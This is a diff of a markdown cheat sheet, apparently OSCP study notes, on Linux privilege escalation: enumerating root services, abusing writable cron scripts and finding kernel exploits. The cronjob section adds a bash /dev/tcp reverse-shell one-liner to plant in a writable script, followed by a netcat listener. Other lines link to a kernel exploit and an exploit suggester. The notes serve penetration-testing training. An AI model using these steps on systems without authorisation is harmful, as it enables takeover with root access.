airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/Full Guide (Enumeration to Priv Escalation).md

 8. ***Backup files in interesting locations***
 9. Refer to the link to see if any files are differernt/stands out https://linuxhandbook.com/linux-directory-structure/ from the below command
 10.   `ls -la /home/user`  `ls -la /` `ls -la /tmp` `ls -la /var/backups`

 ### Service Exploit
 1. If there is some unusual service, look for version numbers and look in searchsploit, google, github
 2.   `ps aux | grep "^root"` show all processes running as root.
 3.   `./lse.sh -i -l 1`and see services running with root
 4.   `<program> --version` or  `dpkg -l | grep <program>` for debian or  `rpm –qa | grep <program>` for rpm.
 Enumerate version to exploit.

-### Sudo exploit
+### Cronjobs
+1.  `cat /etc/crontab` View the content of what is running regularly
+2.  `locate <File>` Find out where the file location is.
+3.  `ls -l /PATH/SOMEFILE.SH` check the file permission if we can read or write.
+4.  `bash -i >& /dev/tcp/MYIP/PORT 0>&1` add a revershell if it is writeable
+5.  start a nc listener
+6.

-### Kernal exploit (last resort)
+### Kernal Exploit (last resort)
-1.  https://www.exploit-db.com/exploits/44298 (check this one out :) )
+1. Check winpeas for possible kernel exploits.
 2.`uname -a` `cat /etc/issue` Enumerate kernel version
 3. Find matching exploits (Google, ExploitDB, GitHub) ` searchsploit <KERNAL VERSION> priv esc` on kali
+4. https://www.exploit-db.com/exploits/44298 (check this one out :) )
-4. https://github.com/jondonas/linux-exploit-suggester-2 .
+5. https://github.com/jondonas/linux-exploit-suggester-2 .
+Or check Kernal Vulnerability.
 Transfer file and run
-5. `./linux-exploit-suggester-2.pl –k <KERNAL VERSION> ` (dirty cow is a popular exploit)
+6. `./linux-exploit-suggester-2.pl –k <KERNAL VERSION> ` (dirty cow is a popular exploit)
-6. Enter `/usr/bin/passwd ` to get  a root shell
+7. Enter `/usr/bin/passwd ` to get  a root shell
-7. Kernal exploit may be a one shot ...and may crash the system. /usr/bin/passwd
+8. Kernal exploit may be a one shot ...and may crash the system. /usr/bin/passwd